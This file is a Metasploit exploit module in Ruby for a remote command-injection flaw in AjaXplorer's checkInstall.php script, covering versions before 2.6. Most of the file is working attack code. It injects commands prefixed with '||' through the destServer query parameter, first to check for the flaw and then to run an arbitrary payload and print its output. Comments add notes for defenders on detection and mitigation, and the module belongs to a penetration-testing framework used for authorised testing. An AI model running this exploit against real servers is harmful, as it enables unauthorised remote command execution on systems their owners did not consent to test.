Path: blob/master/modules/exploits/multi/http/ajaxplorer_checkinstall_exec.rb
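##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Metasploit module for the AjaXplorer 'checkInstall.php' command execution
# issue (OSVDB 63552, BID 39334). Per the module description, all AjaXplorer
# versions prior to 2.6 are affected.
#
# Both #check and #exploit issue a single GET request to
# plugins/access.ssh/checkInstall.php below TARGETURI and place a command,
# prefixed with '||', in the 'destServer' query parameter.
#
# Notes for defenders, derived from what this module sends:
# - Detection: web server or WAF logs showing requests for
#   plugins/access.ssh/checkInstall.php whose 'destServer' value contains
#   shell metacharacters such as '||'.
# - Mitigation: upgrade to AjaXplorer 2.6 or later, since the description
#   lists every earlier version as vulnerable.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  # Script path, relative to TARGETURI, that both #check and #exploit request.
  CHECK_INSTALL_PATH = 'plugins/access.ssh/checkInstall.php'.freeze

  # Registers the module metadata and the TARGETURI option.
  #
  # @param info [Hash] metadata overrides passed through to update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'AjaXplorer checkInstall.php Remote Command Execution',
        'Description' => %q{
          This module exploits an arbitrary command execution vulnerability in the
          AjaXplorer 'checkInstall.php' script. All versions of AjaXplorer prior to
          2.6 are vulnerable.
        },
        'Author' => [
          'Julien Cayssol', # Credited according to SecurityFocus
          'David Maciejak', # Metasploit module
          'sinn3r' # Final touch on the Metasploit module
        ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'OSVDB', '63552' ],
          [ 'BID', '39334' ]
        ],
        'Privileged' => false,
        'Payload' => {
          'DisableNops' => true,
          'Space' => 512,
          'Compat' =>
            {
              'ConnectionType' => 'find',
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'generic perl ruby python telnet'
            }
        },
        'Platform' => %w{bsd linux osx unix win},
        'Arch' => ARCH_CMD,
        'Targets' => [[ 'AjaXplorer 2.5.5 or older', {}]],
        'DisclosureDate' => '2010-04-04',
        'DefaultTarget' => 0,
        # Reliability, stability and side effects have not been assessed for
        # this module; the placeholders below say so explicitly.
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base path to AjaXplorer', '/AjaXplorer-2.5.5/'])
      ]
    )
  end

  # Asks the target to echo a random alphabetic marker and looks for that
  # marker in the response body.
  #
  # @return [Msf::Exploit::CheckCode] Vulnerable when a 200 response contains
  #   the marker, Unknown when no response arrives, Safe otherwise
  def check
    marker = Rex::Text.rand_text_alpha(rand(5..9))

    # normalize_uri joins the segments itself, so the base path is passed
    # through unmodified instead of being appended to in place.
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, CHECK_INSTALL_PATH),
      'vars_get' => {
        'destServer' => "||echo #{marker}"
      }
    })

    # No response says nothing about the target. Reporting Safe here would
    # give a false all-clear to anyone using this check for verification.
    return Exploit::CheckCode::Unknown unless res

    # The marker is purely alphabetic, so a plain substring test is enough.
    if res.code == 200 && res.body.to_s.include?(marker)
      return Exploit::CheckCode::Vulnerable
    end

    Exploit::CheckCode::Safe
  end

  # Sends the encoded command payload in the 'destServer' parameter and
  # prints whatever the response reports between "Received output: [" and "]".
  #
  # @return [void]
  def exploit
    # Trigger the command execution bug
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, CHECK_INSTALL_PATH),
      'vars_get' => {
        'destServer' => "||#{payload.encoded}"
      }
    })

    # A missing response is not reported as a failure; there is simply
    # nothing to display.
    return unless res

    print_status("The server returned: #{res.code} #{res.message}")

    # First bracketed value after "Received output:", or '' when absent.
    output = res.body.to_s[/Received output:\s\[([^\]]+)\]/, 1].to_s

    if output.empty?
      print_error("This server may not be vulnerable")
    else
      print_status("Command output from the server:")
      print_line(output)
    end
  end
end

=begin
Repo:
http://sourceforge.net/projects/ajaxplorer/files/ajaxplorer/2.6/
=end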